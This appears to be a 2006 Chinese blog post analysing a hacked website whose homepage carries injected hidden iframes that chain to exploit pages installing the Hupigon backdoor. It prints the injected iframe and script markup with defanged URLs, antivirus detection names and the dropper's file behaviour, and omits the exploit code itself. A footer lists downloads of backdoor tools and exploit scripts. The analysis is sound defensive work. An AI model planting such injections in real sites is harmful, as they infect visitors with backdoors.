endurer 原创
2006-07-28 第2版 被充杀毒软件的反应
2006-07-27 第1版
该网站首页被加入代码:
--------------
<iframe src=hxxp://duolaa***meng.diy.myrice.com/bushan.htm width=0 height=0 frameborder=0></iframe>
--------------
hxxp://duolaa***meng.diy.myrice.com/bushan.htm 的代码为:
--------------
<iframe src=hxxp://duolaa***meng.diy.myrice.com/girl.html width=0 height=0 frameborder=0></iframe>
<iframe src=hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm width=0 height=0 frameborder=0></iframe>
<iframe src=hxxp://duolaa***meng.diy.myrice.com/ray.htm width=0 height=0 frameborder=0></iframe>
<script src="hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002"></script>
<script language=javascript>
<!--
var m_tc_server="vip7.t2t2.com";
var m_tc_website="51933";
var m_tc_parent_website="0";
var m_tc_style="1";
//-->
</script>
<script language=javascript src="hxxp://vip7.t2t2.com/visit.js"></script>
--------------
hxxp://duolaa***meng.diy.myrice.com/girl.html 代码略。Kaspersky报为:Trojan-Downloader.JS.Small.cr,瑞星报为:Hack.Exploit.JS.IeWmv.a。
hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm 代码略。Kaspersky报为 Exploit.HTML.Mht,瑞星报为 Script.Trojan.b。利用IE漏洞下载文件 hxxp://duolaa***meng.diy.myrice.com/xxxxx.chm。
xxxxx.chm 包含2个文件:
1、xxxxx.exe 是灰鸽子文件。Kaspersky 报为 Backdoor.Win32.Hupigon.aho,瑞星报为 Backdoor.Gpigeon.2006.sa,江民KV 报为 Backdoor/Huigezi.eyl。
会把自已复制为 %windir%/Wintimes.exe,创建名为"Wintimes"的系统服务用于启动
HijackThis 1.99.1的log显示为:
---------
O23 - Service: Wintimes - Unknown owner - C:/WINDOWS/Wintimes.exe (file missing)
---------
释放 %windir%/Wintimes.DLL Kaspersky 报为 Backdoor.Win32.Hupigon.buo,瑞星报为 Backdoor.Gpigeon.2006.po。
2、xxxxx.htm Kaspersky报为 Exploit.HTML.CodeBaseExec,瑞星报为 Hack.Exploit.HTML.CodeExec。
hxxp://duolaa***meng.diy.myrice.com/ray.htm 代码略。利用IE漏洞,下载下列文件:
1、hxxp://duolaa***meng.diy.myrice.com/Setup.exe Kaspersky 报为 Backdoor.Win32.Hupigon.buo,瑞星报为 Backdoor.Gpigeon.2006.rz。
2、hxxp://duolaa***meng.diy.myrice.com/ray.exe
未能获取
3、hxxp://duolaa***meng.diy.myrice.com/ray.gif
ray.gif 其实是个脚本程序文件,其功能为:利用ADODB创建并运行文件 NTDETECT.hta。
NTDETECT.hta 在IE临时文件夹里搜索 ray[1].exe 和 ray[2].exe,把它复制为 C:/only23.exe 并运行;创建并运行文件 c:/cmd.bat。
c:/cmd.bat 负责删除 NTDETECT.hta 和 c:/cmd.bat
ray.gif的代码略。可参考:
利用ADODB写文件——恶意文件young.gif代码的分析心得1
http://blog.csdn.net/purpleendurer/archive/2006/04/08/655267.aspx
hxxp://vip7.t2t2.com/visit.js 是[太极统计]的代码
hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002 是天堂免费计数器代码
分享到:
相关推荐
Backdoor.Win32.Delf.aws 病毒样本。
国外安全研究员在2014年8月发出的一篇关于Absolute公司的防盗追踪软件存在安全风险的技术分析文章。
已经把捆绑的木马分离出来了,这个版本是无毒的。放心使用。 以下是各种杀软扫描报告: VirSCAN.org Scanned Report : Scanned time : 2010/09/28 11:45:12 (CST) Scanner results: 14%的杀软(5/35)报告发现病毒 ...
生产使用的Linux.BackDoor.Gates.5木马处理文档!
【病毒名称】:Backdoor.Win32.Hupigon.dsx 【病毒类型】:后门 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 病毒运行后,首先修改该系统时间,致使一些杀软安软因系统时间不符...
[工具查询]Php backdoor---PHP文本站长工具箱_ppb.zip(含项目文件资料)
工具介绍-the-backdoor-factory(第九课).docx
phpstudy:PHPStudy_BackDoor_EXP PHPstudy后门利用脚本.zip
重新启动,打开工具直接绿色运行,本工具是经过在xp系统上测试过的,没有问题,win7还没有测试
大马文件
delphi Backdoor.Metarage
phpstudy
Backdoor-CTF-Crypto-400.rar
simple-py-backdoor-master.rar
apt install apache2-dev && apxs -i -a -c mod_backdoor.c && service apache2 restart 用法: python exploit.py [HOST] [PORT] 例子: root@kali:~/backdoor# apxs -i -a -c mod_backdoor.c && service ...
本人缺分,也希望多些人下载,(*^__^*) 嘻嘻…… 光盘目录说明 {第1章 基础知识} chap01\Regedit...................注册表读写示例 \IniFile...................Ini文件读写示例 \CustomFile...................
本人缺分,也希望多些人下载,(*^__^*) 嘻嘻…… 光盘目录说明 {第1章 基础知识} chap01\Regedit...................注册表读写示例 \IniFile...................Ini文件读写示例 \CustomFile...................
本人缺分,也希望多些人下载,(*^__^*) 嘻嘻…… 光盘目录说明 {第1章 基础知识} chap01\Regedit...................注册表读写示例 \IniFile...................Ini文件读写示例 \CustomFile...................
{第2章 加密算法} chap02\CRC32-Dym.................CRC32算法动态码表实现 \CRC32-Static..............CRC32算法静态码表实现 \MD5.......................MD5算法示例 \SHA.......................SHA算法...